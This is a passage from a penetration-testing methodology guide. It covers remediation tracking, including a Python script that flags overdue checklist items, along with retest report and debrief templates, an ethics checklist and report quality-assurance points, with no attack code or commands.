- [ ] Clickjacking vulnerability - @web-team
- [ ] Password policy improvements - @iam-team

## Tracking Metrics
- Total findings: 40
- Critical: 5 (12.5%)
- High: 12 (30%)
- Medium: 8 (20%)
- Low: 15 (37.5%)

## Progress Updates
- Week 1: Critical items assigned
- Week 2: 3/5 critical items remediated
- Week 3: All critical items remediated, high priority in progress
- Week 4: Re-testing scheduled
```
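The roadmap's tracking metrics and weekly progress notes can be derived from the checklist itself rather than maintained separately. The script below is an added example, not the article's code: it parses `- [ ]` / `- [x]` items under the `## <Priority> Priority` headings, applies the roadmap's SLA per priority (7, 28 and 90 days, taken from the bracketed ranges in the headings), and reports per-priority completion plus which open items have passed their deadline relative to the report date. The embedded roadmap text is a constructed sample.

```python
"""Remediation tracker over the roadmap checklist format.

Added example (not the article's code). SLA_DAYS is derived from the
priority headings above; SAMPLE_ROADMAP is a constructed sample.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import date, timedelta

SLA_DAYS = {"Critical": 7, "High": 28, "Medium": 90}  # 0-7 days, 1-4 weeks, 1-3 months

SAMPLE_ROADMAP = """\
## Remediation Roadmap

## Critical Priority (0-7 days)
- [x] SQL Injection in admin portal - @security-team
- [ ] RCE via file upload - @dev-team
- [x] Default admin credentials on server - @ops-team

## High Priority (1-4 weeks)
- [ ] XSS in contact form - @dev-team
- [x] Missing rate limiting - @ops-team

## Medium Priority (1-3 months)
- [ ] Missing security headers - @ops-team
"""

HEADING_RE = re.compile(r"^##\s+(Critical|High|Medium|Low)\s+Priority")
ITEM_RE = re.compile(r"^- \[([ xX])\]\s+(.*?)\s+-\s+(@\S+)\s*$")


@dataclass(frozen=True)
class Item:
    priority: str
    title: str
    owner: str
    done: bool


def parse_roadmap(text: str) -> list[Item]:
    """Collect checklist items, tagging each with the priority heading above it."""
    items: list[Item] = []
    current = None
    for line in text.splitlines():
        heading = HEADING_RE.match(line)
        if heading:
            current = heading.group(1)
            continue
        item = ITEM_RE.match(line)
        if item and current:
            items.append(Item(current, item.group(2), item.group(3), item.group(1).lower() == "x"))
    return items


def is_overdue(it: Item, reported: date, today: date) -> bool:
    """Open and past the priority's SLA deadline counted from the report date."""
    deadline = reported + timedelta(days=SLA_DAYS.get(it.priority, 365))
    return not it.done and today > deadline


def status(items: list[Item], reported: date, today: date) -> dict[str, dict[str, int]]:
    """Per priority: total, fixed, open and overdue counts."""
    report: dict[str, dict[str, int]] = {}
    for it in items:
        row = report.setdefault(it.priority, {"total": 0, "fixed": 0, "open": 0, "overdue": 0})
        row["total"] += 1
        row["fixed" if it.done else "open"] += 1
        row["overdue"] += int(is_overdue(it, reported, today))
    return report


def completion_pct(items: list[Item], priorities=("Critical", "High")) -> float:
    """Share of items in the given priorities that are closed (the retest headline figure)."""
    pool = [it for it in items if it.priority in priorities]
    return 100.0 * sum(it.done for it in pool) / len(pool) if pool else 0.0


if __name__ == "__main__":
    items = parse_roadmap(SAMPLE_ROADMAP)
    reported, today = date(2024, 11, 15), date(2024, 12, 1)
    for prio, row in status(items, reported, today).items():
        print(f"{prio:<9} {row}")
    for it in items:
        if is_overdue(it, reported, today):
            print(f"OVERDUE: [{it.priority}] {it.title} ({it.owner})")
    print(f"Critical/High remediated: {completion_pct(items):.0f}%")
```

Running the tracker before each status call gives the client a list of overdue items with owners attached, which is more actionable than the percentage alone.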

6.4 Retest Report

```markdown
## Retest Results

## Date: December 1, 2024
## Tester: [Name]

## Remediation Status

### Critical Findings
1. **SQL Injection (admin portal)** - ✅ FIXED
   - Prepared statements implemented
   - Input validation added
   - Confirmed not exploitable

2. **RCE via file upload** - ✅ FIXED
   - File type validation implemented
   - Upload directory secured
   - Cannot execute uploaded files

3. **Default credentials** - ✅ FIXED
   - Default accounts removed
   - Strong passwords enforced

### Remaining Issues
4. **Insecure API endpoint** - ⚠️ PARTIALLY FIXED
   - Authentication added
   - Rate limiting still missing
   - Recommend: Implement rate limiting

5. **Weak SSL configuration** - ❌ NOT FIXED
   - Still using TLS 1.0
   - Weak ciphers enabled
   - Recommend: Update to TLS 1.2+

## Overall Assessment
**70% of critical and high findings remediated**
**Remaining risk: MEDIUM**

Client has made significant progress. Recommend quarterly
penetration testing to maintain security posture.
```

Phase 7: Post-Assessment Activities

7.1 Knowledge Transfer

Prepare for the client presentation.

Slide deck covering:
- Methodology overview
- Key findings
- Attack demonstrations
- Remediation guidance
- Q&A session

Hands-on workshop:
- Demonstrate exploitation
- Walk through fixes
- Answer technical questions
- Provide tool recommendations

7.2 Lessons Learned

```markdown
## Internal Debrief

## What Went Well
- Comprehensive reconnaissance uncovered hidden assets
- SQL injection led to full database compromise
- Client responsive to critical findings
- Good communication throughout engagement

## Challenges
- Network instability during scanning
- Limited testing window
- Some systems unavailable for testing
- False positives in automated scans

## Improvements for Next Time
- Request more detailed asset inventory upfront
- Build in buffer time for retesting
- Implement better scan throttling
- Enhance automated scanning accuracy

## Tools Evaluation
- Nmap: Excellent, no issues
- SQLMap: Found SQLi but noisy
- Burp Suite: Essential for web testing
- Nuclei: Fast but many false positives
```

Best Practices and Professional Standards

Ethical Considerations

✓ Always obtain written authorization
✓ Stay within defined scope
✓ Report critical findings immediately
✓ Protect client confidentiality
✓ Don't access more data than necessary for PoC
✓ Clean up testing artifacts
✓ Follow coordinated disclosure
✓ Maintain professional integrity

✗ Never test without authorization
✗ Don't exceed scope boundaries
✗ Don't exploit for personal gain
✗ Don't publicly disclose without permission
✗ Don't cause unnecessary system damage
✗ Don't ignore safety protocols

Quality Assurance

Report review checklist:

Technical Accuracy:
- [ ] All findings verified and reproducible
- [ ] CVSS scores calculated correctly
- [ ] Technical details accurate
- [ ] Remediation advice sound

Completeness:
- [ ] All in-scope assets tested
- [ ] Evidence screenshots included
- [ ] Proof of concept code provided
- [ ] References cited

Clarity:
- [ ] Executive summary for non-technical audience
- [ ] Technical details for engineers
- [ ] Clear remediation steps
- [ ] No jargon without explanation

Professional:
- [ ] Grammar and spelling correct
- [ ] Consistent formatting
- [ ] Professional tone throughout
- [ ] Branded template used

Conclusion

Professional penetration testing methodology ensures comprehensive, consistent, and valuable security assessments. Key principles:

  ✅ Structured approach: Follow established methodologies
  ✅ Clear communication: Maintain transparency with clients
  ✅ Thorough documentation: Record all activities and findings
  ✅ Actionable reporting: Provide clear remediation guidance
  ✅ Ethical conduct: Always operate within legal and moral boundaries
  ✅ Continuous improvement: Learn from each engagement
  ✅ Quality focus: Deliver maximum value to clients

Master this methodology through practice, staying current with evolving threats, and maintaining the highest professional and ethical standards. Successful penetration testing not only identifies vulnerabilities but helps organizations build stronger, more resilient security postures.

Remember: Penetration testing is about helping organizations improve security, not just finding vulnerabilities. Professional methodology ensures you deliver lasting value to every client.

Thank you for reading! If you have any feedback or comments, please send them to [email protected].